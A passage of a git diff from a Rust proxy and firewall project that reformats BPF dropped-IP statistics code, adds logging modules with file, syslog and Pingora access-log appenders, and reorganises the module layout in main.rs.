libbpf_rs::MapFlags::ANY) { + if let Ok(batch_iter) = skel.maps.dropped_ipv4_addresses.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { for (key_bytes, value_bytes) in batch_iter { batch_worked = true; if key_bytes.len() >= 4 && value_bytes.len() >= 8 { let ip_bytes = [key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3]]; let ip_addr = Ipv4Addr::from(ip_bytes); let drop_count = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); if drop_count > 0 { - log::debug!("Found dropped IPv4: {} (dropped {} times)", ip_addr, drop_count); + log::debug!( + "Found dropped IPv4: {} (dropped {} times)", + ip_addr, + drop_count + ); ipv4_addresses.insert(ip_addr.to_string(), drop_count); count += 1; } } } } - + // If batch lookup returned nothing, try keys iterator as fallback if !batch_worked { log::debug!("Batch lookup empty, trying keys iterator for IPv4"); for key_bytes in skel.maps.dropped_ipv4_addresses.keys() { if key_bytes.len() >= 4 { - if let Ok(Some(value_bytes)) = skel.maps.dropped_ipv4_addresses.lookup(&key_bytes, libbpf_rs::MapFlags::ANY) { + if let Ok(Some(value_bytes)) = skel + .maps + .dropped_ipv4_addresses + .lookup(&key_bytes, libbpf_rs::MapFlags::ANY) + { if value_bytes.len() >= 8 { let ip_bytes = [key_bytes[0], key_bytes[1], key_bytes[2], key_bytes[3]]; let ip_addr = Ipv4Addr::from(ip_bytes); let drop_count = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); if drop_count > 0 { - log::debug!("Found dropped IPv4 (via keys): {} (dropped {} times)", ip_addr, drop_count); + log::debug!( + "Found dropped IPv4 (via keys): {} (dropped {} times)", + ip_addr, + drop_count + ); ipv4_addresses.insert(ip_addr.to_string(), drop_count); count += 1; } @@ -186,9 +226,13 @@ impl BpfAccessStats { // Read IPv6 addresses - try batch lookup first, fall back to keys iterator log::debug!("Reading IPv6 dropped addresses from BPF map"); let mut ipv6_count = 0; - + let mut batch_worked = false; - if let Ok(batch_iter) = skel.maps.dropped_ipv6_addresses.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + if let Ok(batch_iter) = skel.maps.dropped_ipv6_addresses.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { for (key_bytes, value_bytes) in batch_iter { batch_worked = true; if key_bytes.len() >= 16 && value_bytes.len() >= 8 { @@ -196,34 +240,58 @@ impl BpfAccessStats { ip_bytes.copy_from_slice(&key_bytes[..16]); let ip_addr = Ipv6Addr::from(ip_bytes); let drop_count = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); if drop_count > 0 { - log::debug!("Found dropped IPv6: {} (dropped {} times)", ip_addr, drop_count); + log::debug!( + "Found dropped IPv6: {} (dropped {} times)", + ip_addr, + drop_count + ); ipv6_addresses.insert(ip_addr.to_string(), drop_count); ipv6_count += 1; } } } } - + // If batch lookup returned nothing, try keys iterator if !batch_worked { log::debug!("Batch lookup empty, trying keys iterator for IPv6"); for key_bytes in skel.maps.dropped_ipv6_addresses.keys() { if key_bytes.len() >= 16 { - if let Ok(Some(value_bytes)) = skel.maps.dropped_ipv6_addresses.lookup(&key_bytes, libbpf_rs::MapFlags::ANY) { + if let Ok(Some(value_bytes)) = skel + .maps + .dropped_ipv6_addresses + .lookup(&key_bytes, libbpf_rs::MapFlags::ANY) + { if value_bytes.len() >= 8 { let mut ip_bytes = [0u8; 16]; ip_bytes.copy_from_slice(&key_bytes[..16]); let ip_addr = Ipv6Addr::from(ip_bytes); let drop_count = u64::from_le_bytes([ - value_bytes[0], value_bytes[1], value_bytes[2], value_bytes[3], - value_bytes[4], value_bytes[5], value_bytes[6], value_bytes[7], + value_bytes[0], + value_bytes[1], + value_bytes[2], + value_bytes[3], + value_bytes[4], + value_bytes[5], + value_bytes[6], + value_bytes[7], ]); if drop_count > 0 { - log::debug!("Found dropped IPv6 (via keys): {} (dropped {} times)", ip_addr, drop_count); + log::debug!( + "Found dropped IPv6 (via keys): {} (dropped {} times)", + ip_addr, + drop_count + ); ipv6_addresses.insert(ip_addr.to_string(), drop_count); ipv6_count += 1; } @@ -235,8 +303,12 @@ impl BpfAccessStats { log::debug!("Found {} dropped IPv6 addresses", ipv6_count); let total_unique_dropped_ips = ipv4_addresses.len() as u64 + ipv6_addresses.len() as u64; - log::debug!("Total dropped IP addresses found: {} (IPv4: {}, IPv6: {})", - total_unique_dropped_ips, ipv4_addresses.len(), ipv6_addresses.len()); + log::debug!( + "Total dropped IP addresses found: {} (IPv4: {}, IPv6: {})", + total_unique_dropped_ips, + ipv4_addresses.len(), + ipv6_addresses.len() + ); Ok(DroppedIpAddresses { ipv4_addresses, @@ -245,7 +317,6 @@ impl BpfAccessStats { }) } - /// Convert to JSON string pub fn to_json(&self) -> Result { serde_json::to_string(self) @@ -267,8 +338,13 @@ impl BpfAccessStats { ); // Add top dropped IP addresses if any - if !self.dropped_ip_addresses.ipv4_addresses.is_empty() || !self.dropped_ip_addresses.ipv6_addresses.is_empty() { - summary.push_str(&format!(", {} unique IPs dropped", self.dropped_ip_addresses.total_unique_dropped_ips)); + if !self.dropped_ip_addresses.ipv4_addresses.is_empty() + || !self.dropped_ip_addresses.ipv6_addresses.is_empty() + { + summary.push_str(&format!( + ", {} unique IPs dropped", + self.dropped_ip_addresses.total_unique_dropped_ips + )); // Show top 5 dropped IPv4 addresses let mut ipv4_vec: Vec<_> = self.dropped_ip_addresses.ipv4_addresses.iter().collect(); @@ -276,7 +352,9 @@ impl BpfAccessStats { if !ipv4_vec.is_empty() { summary.push_str(", Top IPv4 drops: "); for (i, (ip, count)) in ipv4_vec.iter().take(5).enumerate() { - if i > 0 { summary.push_str(", "); } + if i > 0 { + summary.push_str(", "); + } summary.push_str(&format!("{}:{}", ip, count)); } } @@ -287,7 +365,9 @@ impl BpfAccessStats { if !ipv6_vec.is_empty() { summary.push_str(", Top IPv6 drops: "); for (i, (ip, count)) in ipv6_vec.iter().take(5).enumerate() { - if i > 0 { summary.push_str(", "); } + if i > 0 { + summary.push_str(", "); + } summary.push_str(&format!("{}:{}", ip, count)); } } @@ -312,7 +392,7 @@ impl DroppedIpEvent { ip_address, ip_version, drop_count, - drop_reason + drop_reason, } } @@ -362,8 +442,7 @@ impl DroppedIpEvents { pub fn summary(&self) -> String { format!( "Dropped IP Events: {} events from {} unique IPs", - self.total_events, - self.unique_ips + self.total_events, self.unique_ips ) } @@ -458,21 +537,30 @@ impl BpfStatsCollector { // Merge IP addresses for (ip, count) in stat.dropped_ip_addresses.ipv4_addresses { - *aggregated.dropped_ip_addresses.ipv4_addresses.entry(ip).or_insert(0) += count; + *aggregated + .dropped_ip_addresses + .ipv4_addresses + .entry(ip) + .or_insert(0) += count; } for (ip, count) in stat.dropped_ip_addresses.ipv6_addresses { - *aggregated.dropped_ip_addresses.ipv6_addresses.entry(ip).or_insert(0) += count; + *aggregated + .dropped_ip_addresses + .ipv6_addresses + .entry(ip) + .or_insert(0) += count; } } // Update total unique dropped IPs count aggregated.dropped_ip_addresses.total_unique_dropped_ips = - aggregated.dropped_ip_addresses.ipv4_addresses.len() as u64 + - aggregated.dropped_ip_addresses.ipv6_addresses.len() as u64; + aggregated.dropped_ip_addresses.ipv4_addresses.len() as u64 + + aggregated.dropped_ip_addresses.ipv6_addresses.len() as u64; // Recalculate drop rate for aggregated data aggregated.drop_rate_percentage = if aggregated.total_packets_processed > 0 { - (aggregated.total_packets_dropped as f64 / aggregated.total_packets_processed as f64) * 100.0 + (aggregated.total_packets_dropped as f64 / aggregated.total_packets_processed as f64) + * 100.0 } else { 0.0 }; @@ -495,7 +583,10 @@ impl BpfStatsCollector { } Err(e) => { // Fallback to text summary if JSON serialization fails - log::warn!("Failed to serialize BPF stats to JSON: {}, using text summary", e); + log::warn!( + "Failed to serialize BPF stats to JSON: {}, using text summary", + e + ); log::info!("{}", stats.summary()); } } @@ -582,7 +673,6 @@ impl BpfStatsCollector { Ok(()) } - /// Reset dropped IP address counters in BPF maps pub fn reset_dropped_ip_counters(&self) -> Result<(), Box> { if !self.enabled { @@ -593,13 +683,21 @@ impl BpfStatsCollector { for skel in &self.skels { // Reset IPv4 counters - match skel.maps.dropped_ipv4_addresses.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + match skel.maps.dropped_ipv4_addresses.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { Ok(batch_iter) => { let mut reset_count = 0; for (key_bytes, _) in batch_iter { if key_bytes.len() >= 4 { let zero_count = 0u64.to_le_bytes(); - if let Err(e) = skel.maps.dropped_ipv4_addresses.update(&key_bytes, &zero_count, libbpf_rs::MapFlags::ANY) { + if let Err(e) = skel.maps.dropped_ipv4_addresses.update( + &key_bytes, + &zero_count, + libbpf_rs::MapFlags::ANY, + ) { log::warn!("Failed to reset IPv4 counter: {}", e); } else { reset_count += 1; @@ -614,13 +712,21 @@ impl BpfStatsCollector { } // Reset IPv6 counters - match skel.maps.dropped_ipv6_addresses.lookup_batch(1000, libbpf_rs::MapFlags::ANY, libbpf_rs::MapFlags::ANY) { + match skel.maps.dropped_ipv6_addresses.lookup_batch( + 1000, + libbpf_rs::MapFlags::ANY, + libbpf_rs::MapFlags::ANY, + ) { Ok(batch_iter) => { let mut reset_count = 0; for (key_bytes, _) in batch_iter { if key_bytes.len() >= 16 { let zero_count = 0u64.to_le_bytes(); - if let Err(e) = skel.maps.dropped_ipv6_addresses.update(&key_bytes, &zero_count, libbpf_rs::MapFlags::ANY) { + if let Err(e) = skel.maps.dropped_ipv6_addresses.update( + &key_bytes, + &zero_count, + libbpf_rs::MapFlags::ANY, + ) { log::warn!("Failed to reset IPv6 counter: {}", e); } else { reset_count += 1; diff --git a/src/logger/bpf_stats_noop.rs b/src/logger/bpf_stats_noop.rs new file mode 100644 index 0000000..b3a655f --- /dev/null +++ b/src/logger/bpf_stats_noop.rs @@ -0,0 +1,83 @@ +//! Noop BPF statistics module for non-BPF builds +//! +//! This module provides stub types when BPF is not enabled. + +use chrono::{DateTime, Utc}; +use std::sync::Arc; + +/// Stub for dropped IP event (no-op when BPF disabled) +#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)] +pub struct DroppedIpEvent { + pub event_type: String, + pub timestamp: DateTime, + pub ip_address: String, +} + +impl DroppedIpEvent { + pub fn new(ip_address: String) -> Self { + Self { + event_type: "dropped_ip".to_string(), + timestamp: Utc::now(), + ip_address, + } + } +} + +/// Stub for BPF stats collector (no-op when BPF disabled) +#[derive(Clone)] +pub struct BpfStatsCollector { + enabled: bool, +} + +impl BpfStatsCollector { + /// Create a new statistics collector (no-op) + pub fn new(_skels: Vec>>, enabled: bool) -> Self { + Self { enabled } + } + + /// Enable or disable statistics collection + pub fn set_enabled(&mut self, enabled: bool) { + self.enabled = enabled; + } + + /// Check if statistics collection is enabled + pub fn is_enabled(&self) -> bool { + self.enabled + } + + /// Log current statistics (no-op) + pub fn log_stats(&self) -> Result<(), Box> { + Ok(()) + } + + /// Log dropped IP events (no-op) + pub fn log_dropped_ip_events(&self) -> Result<(), Box> { + Ok(()) + } +} + +/// Configuration for BPF statistics collection +#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)] +pub struct BpfStatsConfig { + pub enabled: bool, + pub log_interval_secs: u64, +} + +impl Default for BpfStatsConfig { + fn default() -> Self { + Self { + enabled: false, + log_interval_secs: 60, + } + } +} + +impl BpfStatsConfig { + /// Create a new configuration + pub fn new(enabled: bool, log_interval_secs: u64) -> Self { + Self { + enabled, + log_interval_secs, + } + } +} diff --git a/src/logger/mod.rs b/src/logger/mod.rs new file mode 100644 index 0000000..8756a6c --- /dev/null +++ b/src/logger/mod.rs @@ -0,0 +1,247 @@ +use log::LevelFilter; +use log4rs::{ + append::{ + console::{ConsoleAppender, Target}, + rolling_file::{ + RollingFileAppender, + policy::compound::{ + CompoundPolicy, roll::fixed_window::FixedWindowRoller, trigger::size::SizeTrigger, + }, + }, + }, + config::{Appender, Config as Log4rsConfig, Root}, + encode::pattern::PatternEncoder, + filter::threshold::ThresholdFilter, +}; +use std::path::Path; + +pub mod access_log; +#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] +pub mod bpf_stats; +#[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] +#[path = "bpf_stats_noop.rs"] +pub mod bpf_stats; +mod pingora_access_appender; +mod syslog_appender; +use syslog_appender::SyslogAppender; + +use crate::core::cli::SyslogConfig; + +/// Initialize file-based logging with separate files for different log levels +pub fn init_file_logging( + log_level: LevelFilter, + log_directory: &str, + max_log_size: u64, + log_file_count: u32, + daemon_mode: bool, + syslog_config: Option<&SyslogConfig>, +) -> Result<(), Box> { + // Create log directory if it doesn't exist + std::fs::create_dir_all(log_directory)?; + + // Pattern for log messages: timestamp level target - message + let pattern = "{d(%Y-%m-%d %H:%M:%S)} {l} {t} - {m}{n}"; + + // 1. Console appender - writes to stdout in daemon mode, stderr otherwise + let console_target = if daemon_mode { + Target::Stdout + } else { + Target::Stderr + }; + + let console = ConsoleAppender::builder() + .target(console_target) + .encoder(Box::new(PatternEncoder::new(pattern))) + .build(); + + // 2. Error log file appender - only errors and above + let error_log_path = Path::new(log_directory).join("error.log"); + let error_log_pattern = Path::new(log_directory).join("error.{}.log.gz"); + + let error_roller = FixedWindowRoller::builder() + .base(1) // Start numbering at 1 + .build(error_log_pattern.to_str().unwrap(), log_file_count) + .map_err(|e| format!("Failed to create error log roller: {}", e))?; + + let error_policy = CompoundPolicy::new( + Box::new(SizeTrigger::new(max_log_size)), + Box::new(error_roller), + ); + + let error_file = RollingFileAppender::builder() + .encoder(Box::new(PatternEncoder::new(pattern))) + .build(error_log_path, Box::new(error_policy)) + .map_err(|e| format!("Failed to create error log appender: {}", e))?; + + // 3. General application log file appender - all logs + let app_log_path = Path::new(log_directory).join("app.log"); + let app_log_pattern = Path::new(log_directory).join("app.{}.log.gz"); + + let app_roller = FixedWindowRoller::builder() + .base(1) // Start numbering at 1 + .build(app_log_pattern.to_str().unwrap(), log_file_count) + .map_err(|e| format!("Failed to create app log roller: {}", e))?; + + let app_policy = CompoundPolicy::new( + Box::new(SizeTrigger::new(max_log_size)), + Box::new(app_roller), + ); + + let app_file = RollingFileAppender::builder() + .encoder(Box::new(PatternEncoder::new(pattern))) + .build(app_log_path, Box::new(app_policy)) + .map_err(|e| format!("Failed to create app log appender: {}", e))?; + + // 4. Access log file appender - JSON format for access logs (proxy mode only) + let access_log_path = Path::new(log_directory).join("access.log"); + let access_log_pattern = Path::new(log_directory).join("access.{}.log.gz"); + + let access_roller = FixedWindowRoller::builder() + .base(1) // Start numbering at 1 + .build(access_log_pattern.to_str().unwrap(), log_file_count) + .map_err(|e| format!("Failed to create access log roller: {}", e))?; + + let access_policy = CompoundPolicy::new( + Box::new(SizeTrigger::new(max_log_size)), + Box::new(access_roller), + ); + + // Access logs use plain pattern since they're already JSON formatted + let access_file = RollingFileAppender::builder() + .encoder(Box::new(PatternEncoder::new("{m}{n}"))) + .build(&access_log_path, Box::new(access_policy)) + .map_err(|e| format!("Failed to create access log appender: {}", e))?; + + // Build the log4rs config + let mut config_builder = Log4rsConfig::builder() + // Console appender - all logs at configured level + .appender(Appender::builder().build("console", Box::new(console))) + // Error file appender - only errors + .appender( + Appender::builder() + .filter(Box::new(ThresholdFilter::new(LevelFilter::Error))) + .build("error_file", Box::new(error_file)), + ) + // App file appender - all logs at configured level + .appender(Appender::builder().build("app_file", Box::new(app_file))) + // Access file appender - only for access_log target + .appender(Appender::builder().build("access_file", Box::new(access_file))); + + let pingora_access_appender = + pingora_access_appender::PingoraAccessAppender::new(&access_log_path)?; + config_builder = config_builder.appender( + Appender::builder().build("pingora_access_file", Box::new(pingora_access_appender)), + ); + + // Add syslog appenders if enabled + let mut root_appenders = vec!["console", "error_file", "app_file"]; + let mut access_appenders = vec!["access_file"]; + + if let Some(syslog_cfg) = syslog_config { + if syslog_cfg.enabled { + // Error syslog appender + let error_syslog = SyslogAppender::new( + &syslog_cfg.facility, + &syslog_cfg.identifier, + &syslog_cfg.levels.error, + )?; + + config_builder = config_builder.appender( + Appender::builder() + .filter(Box::new(ThresholdFilter::new(LevelFilter::Error))) + .build("error_syslog", Box::new(error_syslog)), + ); + root_appenders.push("error_syslog"); + + // App syslog appender + let app_syslog = SyslogAppender::new( + &syslog_cfg.facility, + &syslog_cfg.identifier, + &syslog_cfg.levels.app, + )?; + + config_builder = config_builder + .appender(Appender::builder().build("app_syslog", Box::new(app_syslog))); + root_appenders.push("app_syslog"); + + // Access syslog appender + let access_syslog = SyslogAppender::new( + &syslog_cfg.facility, + &syslog_cfg.identifier, + &syslog_cfg.levels.access, + )?; + + config_builder = config_builder + .appender(Appender::builder().build("access_syslog", Box::new(access_syslog))); + access_appenders.push("access_syslog"); + } + } + + // Logger for access logs - routes to access appenders (not console) + let mut access_logger_builder = log4rs::config::Logger::builder(); + for appender in &access_appenders { + access_logger_builder = access_logger_builder.appender(*appender); + } + + config_builder = config_builder.logger( + access_logger_builder + .additive(false) // Don't propagate to root logger + .build("access_log", LevelFilter::Info), + ); + config_builder = config_builder.logger( + log4rs::config::Logger::builder() + .appender("pingora_access_file") + .additive(false) + .build("pingora_proxy", LevelFilter::Info), + ); + + // Root logger configuration + let mut root_builder = Root::builder(); + for appender in &root_appenders { + root_builder = root_builder.appender(*appender); + } + + let config = config_builder + .build(root_builder.build(log_level)) + .map_err(|e| format!("Failed to build log config: {}", e))?; + + // Initialize log4rs + log4rs::init_config(config).map_err(|e| format!("Failed to initialize log4rs: {}", e))?; + + Ok(()) +} + +/// Initialize simple console-only logging (fallback when file logging is disabled) +pub fn init_console_logging( + log_level: LevelFilter, + daemon_mode: bool, +) -> Result<(), Box> { + let pattern = "{d(%Y-%m-%d %H:%M:%S)} {l} {t} - {m}{n}"; + + let console_target = if daemon_mode { + Target::Stdout + } else { + Target::Stderr + }; + + let console = ConsoleAppender::builder() + .target(console_target) + .encoder(Box::new(PatternEncoder::new(pattern))) + .build(); + + let config = Log4rsConfig::builder() + .appender(Appender::builder().build("console", Box::new(console))) + .build(Root::builder().appender("console").build(log_level)) + .map_err(|e| format!("Failed to build console log config: {}", e))?; + + log4rs::init_config(config) + .map_err(|e| format!("Failed to initialize console logging: {}", e))?; + + Ok(()) +} + +/// Get the access log target name for use with log macros +/// This allows routing access logs to a separate file +pub fn access_log_target() -> &'static str { + "access_log" +} diff --git a/src/logger/pingora_access_appender.rs b/src/logger/pingora_access_appender.rs new file mode 100644 index 0000000..a9ab2d5 --- /dev/null +++ b/src/logger/pingora_access_appender.rs @@ -0,0 +1,59 @@ +use log::Record; +use log4rs::append::Append; +use std::fs::{File, OpenOptions}; +use std::io::Write; +use std::path::{Path, PathBuf}; +use std::sync::Mutex; + +/// Minimal file appender used for Pingora access logs. +/// +/// Pingora emits access logs through the `pingora_proxy` logger target. We keep this +/// separate from the main access log appender to avoid coupling to log4rs encoders. +pub struct PingoraAccessAppender { + path: PathBuf, + file: Mutex, +} + +impl std::fmt::Debug for PingoraAccessAppender { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + f.debug_struct("PingoraAccessAppender") + .field("path", &self.path) + .field("file", &"") + .finish() + } +} + +impl PingoraAccessAppender { + pub fn new(path: &Path) -> Result> { + let file = OpenOptions::new() + .create(true) + .append(true) + .open(path)?; + + Ok(Self { + path: path.to_path_buf(), + file: Mutex::new(file), + }) + } +} + +impl Append for PingoraAccessAppender { + fn append(&self, record: &Record) -> anyhow::Result<()> { + // Pingora access logs are already formatted as a single line message (typically JSON). + let mut msg = format!("{}", record.args()); + if !msg.ends_with('\n') { + msg.push('\n'); + } + + let mut file = self.file.lock().unwrap(); + file.write_all(msg.as_bytes())?; + Ok(()) + } + + fn flush(&self) { + if let Ok(mut file) = self.file.lock() { + let _ = file.flush(); + } + } +} + diff --git a/src/logger/syslog_appender.rs b/src/logger/syslog_appender.rs new file mode 100644 index 0000000..cbb34ec --- /dev/null +++ b/src/logger/syslog_appender.rs @@ -0,0 +1,103 @@ +use log::Record; +use log4rs::append::Append; +use std::sync::Mutex; +use syslog::{Facility, Formatter3164}; + +/// Custom syslog appender for log4rs +pub struct SyslogAppender { + writer: Mutex>, +} + +impl std::fmt::Debug for SyslogAppender { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + f.debug_struct("SyslogAppender") + .field("writer", &"") + .finish() + } +} + +impl SyslogAppender { + /// Create a new syslog appender + pub fn new( + facility_str: &str, + identifier: &str, + _priority_str: &str, // Priority is determined by log level, not configuration + ) -> Result> { + // Parse facility + let facility = parse_facility(facility_str)?; + + // Create syslog formatter + let formatter = Formatter3164 { + facility, + hostname: None, + process: identifier.to_string(), + pid: std::process::id(), + }; + + // Connect to syslog - try unix socket first, then TCP, then UDP + let writer = syslog::unix(formatter.clone()) + .or_else(|_| { + log::warn!("Failed to connect to unix syslog, trying TCP"); + syslog::tcp(formatter.clone(), ("127.0.0.1", 601)) + }) + .or_else(|_| { + log::warn!("Failed to connect to TCP syslog, trying UDP"); + syslog::udp(formatter.clone(), "127.0.0.1:0", "127.0.0.1:514") + }) + .map_err(|e| format!("Failed to connect to syslog: {}", e))?; + + Ok(Self { + writer: Mutex::new(writer), + }) + } +} + +impl Append for SyslogAppender { + fn append(&self, record: &Record) -> anyhow::Result<()> { + // Format the log message directly (syslog adds its own metadata) + let message = format!("{}", record.args()); + + // Get writer lock and send to syslog with appropriate severity based on log level + let mut writer = self.writer.lock().unwrap(); + match record.level() { + log::Level::Error => writer.err(message.trim())?, + log::Level::Warn => writer.warning(message.trim())?, + log::Level::Info => writer.info(message.trim())?, + log::Level::Debug => writer.debug(message.trim())?, + log::Level::Trace => writer.debug(message.trim())?, + } + + Ok(()) + } + + fn flush(&self) { + // Syslog doesn't need explicit flushing + } +} + +/// Parse syslog facility from string +fn parse_facility(s: &str) -> Result> { + match s.to_lowercase().as_str() { + "kern" => Ok(Facility::LOG_KERN), + "user" => Ok(Facility::LOG_USER), + "mail" => Ok(Facility::LOG_MAIL), + "daemon" => Ok(Facility::LOG_DAEMON), + "auth" => Ok(Facility::LOG_AUTH), + "syslog" => Ok(Facility::LOG_SYSLOG), + "lpr" => Ok(Facility::LOG_LPR), + "news" => Ok(Facility::LOG_NEWS), + "uucp" => Ok(Facility::LOG_UUCP), + "cron" => Ok(Facility::LOG_CRON), + "authpriv" => Ok(Facility::LOG_AUTHPRIV), + "ftp" => Ok(Facility::LOG_FTP), + "local0" => Ok(Facility::LOG_LOCAL0), + "local1" => Ok(Facility::LOG_LOCAL1), + "local2" => Ok(Facility::LOG_LOCAL2), + "local3" => Ok(Facility::LOG_LOCAL3), + "local4" => Ok(Facility::LOG_LOCAL4), + "local5" => Ok(Facility::LOG_LOCAL5), + "local6" => Ok(Facility::LOG_LOCAL6), + "local7" => Ok(Facility::LOG_LOCAL7), + _ => Err(format!("Unknown syslog facility: {}", s).into()), + } +} diff --git a/src/main.rs b/src/main.rs index e57c726..79d9335 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,8 +1,9 @@ -use std::sync::Arc; -use std::str::FromStr; -use std::fs::File; +use std::io; #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] use std::mem::MaybeUninit; +use std::str::FromStr; +use std::sync::Arc; +use std::collections::HashMap; use anyhow::{Context, Result}; use clap::Parser; @@ -15,64 +16,60 @@ use nix::net::if_::if_nametoindex; #[global_allocator] static GLOBAL: mimalloc::MiMalloc = mimalloc::MiMalloc; -pub mod access_log; -pub mod access_rules; -pub mod app_state; -pub mod captcha_server; -pub mod cli; -pub mod content_scanning; +pub mod core; +pub mod logger; +pub mod platform; +pub mod proxy; +pub mod security; +pub mod server; +pub mod storage; +pub mod utils; +pub mod worker; + +// BPF conditional compilation - uses nested module structure #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] -pub mod firewall; +pub mod firewall { + pub use crate::security::firewall::*; +} #[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] -#[path = "firewall_noop.rs"] +#[path = "security/firewall_noop.rs"] pub mod firewall; -pub mod http_client; -pub mod waf; -pub mod threat; -pub mod redis; -pub mod proxy_protocol; -pub mod authcheck; -pub mod http_proxy; + #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] pub mod bpf { - // Include the skeleton generated by build.rs into OUT_DIR at compile time - include!(concat!(env!("OUT_DIR"), "/filter.skel.rs")); + pub use crate::security::firewall::bpf::*; } #[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] #[path = "bpf_stub.rs"] pub mod bpf; -#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] -pub mod bpf_stats; -#[cfg(any(not(feature = "bpf"), feature = "disable-bpf"))] -#[path = "bpf_stats_noop.rs"] -pub mod bpf_stats; -pub mod ja4_plus; -pub mod utils; -pub mod worker; -pub mod acme; - +use log::{error, info, warn}; use tokio::signal; use tokio::sync::watch; -use log::{error, info, warn}; -use crate::app_state::AppState; -use crate::bpf_stats::BpfStatsCollector; -use crate::utils::tcp_fingerprint::TcpFingerprintCollector; -use crate::utils::tcp_fingerprint::TcpFingerprintConfig; -use crate::cli::{Args, Config}; -use crate::waf::wirefilter::init_config; -use crate::content_scanning::{init_content_scanner, ContentScanningConfig}; -#[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] -use crate::utils::bpf_utils::bpf_attach_to_xdp; +use crate::core::app_state::AppState; +use crate::core::cli::{Args, Config}; +use crate::logger::bpf_stats::BpfStatsCollector; +use crate::security::waf::actions::content_scanning::{ + ContentScanningConfig, init_content_scanner, +}; +use crate::security::waf::wirefilter::init_config; #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] -use crate::utils::bpf_utils::bpf_detach_from_xdp; - -use crate::access_log::LogSenderConfig; +use crate::utils::bpf_utils::{bpf_attach_to_xdp, bpf_detach_from_xdp}; +use crate::utils::fingerprint::tcp_fingerprint::TcpFingerprintCollector; +use crate::utils::fingerprint::tcp_fingerprint::TcpFingerprintConfig; + +use crate::logger::access_log::LogSenderConfig; +use crate::platform::agent_status::{ + AgentStatusIdentity, add_platform_metadata, derive_agent_id, read_workspace_id_from_env, +}; +use crate::platform::authcheck::validate_api_key; +use crate::security::waf::actions::captcha::{ + CaptchaConfig, CaptchaProvider, init_captcha_client, start_cache_cleanup_task, +}; +use crate::utils::http_client::init_global_client; +use crate::worker::agent_status::AgentStatusWorker; use crate::worker::log::set_log_sender_config; -use crate::authcheck::validate_api_key; -use crate::http_client::init_global_client; -use crate::waf::actions::captcha::{CaptchaConfig, CaptchaProvider, init_captcha_client, start_cache_cleanup_task}; fn main() -> Result<()> { // Initialize rustls crypto provider early (must be done before any rustls operations) @@ -84,27 +81,26 @@ fn main() -> Result<()> { // Handle clear certificate command (runs before loading full config) if let Some(certificate_name) = &args.clear_certificate { // Initialize minimal runtime for async operations - let rt = tokio::runtime::Runtime::new() - .context("Failed to create tokio runtime")?; + let rt = tokio::runtime::Runtime::new().context("Failed to create tokio runtime")?; // Load minimal config for Redis connection - let config = Config::load_from_args(&args) - .context("Failed to load configuration")?; + let (config, _diagnostics) = + Config::load_from_args(&args).context("Failed to load configuration")?; // Initialize Redis if configured - if !config.redis.url.is_empty() { - rt.block_on(crate::redis::RedisManager::init( - &config.redis.url, - config.redis.prefix.clone(), - config.redis.ssl.as_ref(), + if !config.proxy.redis.url.is_empty() { + rt.block_on(crate::storage::redis::RedisManager::init( + &config.proxy.redis.url, + config.proxy.redis.prefix.clone(), + config.proxy.redis.ssl.as_ref(), )) .context("Failed to initialize Redis manager")?; } // Get certificate path from config let certificate_path = config - .pingora - .proxy_certificates + .proxy + .certificates .clone() .unwrap_or_else(|| "/etc/synapse/certs".to_string()); @@ -120,22 +116,22 @@ fn main() -> Result<()> { // API key is optional - allow running in local mode without it // Load configuration - let config = Config::load_from_args(&args) - .context("Failed to load configuration")?; + let (config, diagnostics) = match Config::load_from_args(&args) { + Ok(result) => result, + Err(e) => { + if crate::utils::state::is_first_run() { + eprintln!("Fatal configuration error: {}", e); + } + return Err(e).context("Failed to load configuration"); + } + }; // Handle daemonization before starting tokio runtime if config.daemon.enabled { - let stdout = File::create(&config.daemon.stdout) - .with_context(|| format!("Failed to create stdout file: {}", config.daemon.stdout))?; - let stderr = File::create(&config.daemon.stderr) - .with_context(|| format!("Failed to create stderr file: {}", config.daemon.stderr))?; - let mut daemonize = Daemonize::new() .pid_file(&config.daemon.pid_file) .chown_pid_file(config.daemon.chown_pid_file) - .working_directory(&config.daemon.working_directory) - .stdout(stdout) - .stderr(stderr); + .working_directory(&config.daemon.working_directory); if let Some(user) = &config.daemon.user { daemonize = daemonize.user(user.as_str()); @@ -150,8 +146,25 @@ fn main() -> Result<()> { // We're now in the daemon process, continue with application startup } Err(e) => { - eprintln!("Failed to daemonize: {}", e); - return 